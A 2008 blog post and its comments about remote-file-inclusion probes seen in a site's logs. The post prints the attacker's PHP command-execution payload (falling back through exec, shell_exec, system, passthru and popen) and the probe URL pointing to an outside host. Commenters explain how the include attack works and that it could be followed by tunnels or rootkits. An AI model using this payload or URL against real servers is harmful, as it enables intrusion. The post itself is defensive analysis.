The script kiddies that couldn’t shoot straight

Thursday 13 March 2008

One of the things I find entertaining about monitoring web sites is to see the trails of malware. Yesterday, there were a few attempts to request pages from our site with a query parameter added on, for example:

blah/blah?p=http://www.mambembrincantes.com/site/safeon.txt??

I visited that odd URL to see what I could find out, and discovered a plain text file containing PHP code. This is the code (formatted so I could read it):

<?php
    echo "31337:";
    $cmd = "id";
    $eseguicmd = ex($cmd);
    echo $eseguicmd;
    function ex($cfe) {
        $res = '';
        if (!empty($cfe)) {
            if (function_exists('exec')) {
                @exec($cfe, $res);
                $res = join("\n", $res);
            }
            elseif (function_exists('shell_exec')) {
                $res = @shell_exec($cfe);
            }
            elseif (function_exists('system')) {
                @ob_start();
                @system($cfe);
                $res = @ob_get_contents();
                @ob_end_clean();
            }
            elseif (function_exists('passthru')) {
                @ob_start();
                @passthru($cfe);
                $res = @ob_get_contents();
                @ob_end_clean();
            }
            elseif (@is_resource($f = @popen($cfe, "r"))) {
                $res = "";
                while (!@feof($f)) {
                    $res .= @fread($f, 1024);
                }
                @pclose($f);
            }
        }
        return $res;
    }
    exit;
?>

I’m not sure what the heck is going on here. The script looks like it’s trying to accept a command and execute it, except the command is hardcoded to “id”. And what good does it do to hit my server with this URL in a ?p= parameter? Is there some vulnerability somewhere so that a server sent this URL will fetch this PHP and execute it? Is this part of a server-based virus? What good does it do if the command is always “id”? So many questions...

Comments

[gravatar]
Rik Hemsley 12:11 PM on 13 Mar 2008

Quite a few 'attacks' are really just spam - where the idea is to get you to notice URLs in your logs and visit them. Which you did ;)

[gravatar]
Tyberips Prime 12:11 PM on 13 Mar 2008

Well, p is the parameter many (unsecure) sites used instead of filenames (broken design, of course), and then they basically did an include($p). Now, php had* this nice feature of allowing remote url requsets in any file operation - including including code.
Maybe this script is just a test, and if 'id' executes, they can always include the 'real' malware script (and keep the spying eyes of vigalent sysadmins out of it).

*these days, it's thankfully restricted on most systems.

[gravatar]
Michael Brunton-Spall 12:15 PM on 13 Mar 2008

The purpose of the script is to see if your server is vulnerbale to a php include attack.

The hope os that your system uses a system that does an include($p) style call at some point.
Insecurely built PHP systems could then attempt to include the remotely hosted php code, and execute it.
If the vulnrability exists, it would expect to get back the user id of the user running the php / web server process. If that is apache or wwwuser or something they know that the system is vulnerable, but the user is restricted (although it would allow all forms of website hacking, but no total box ownership unless they have a local privelge escalation exploit), if the user is root, they've hit jackpot.

Once they have determined if your server is responsible, they would probably make a second request to include a different script with a different payload, either firing up an ssh tunnel out, or installing a rootkit.

Hope that helps

[gravatar]
Ned Batchelder 2:11 PM on 13 Mar 2008

Thanks guys, now I see how it fits into a larger malware scheme!

Add a comment:

Ignore this:
Leave this empty:
Name is required. Either email or web are required. Email won't be displayed and I won't spam you. Your web site won't be indexed by search engines.
Don't put anything here:
Leave this empty:
URLs auto-link and some tags are allowed: <a><b><i><p><br><pre>.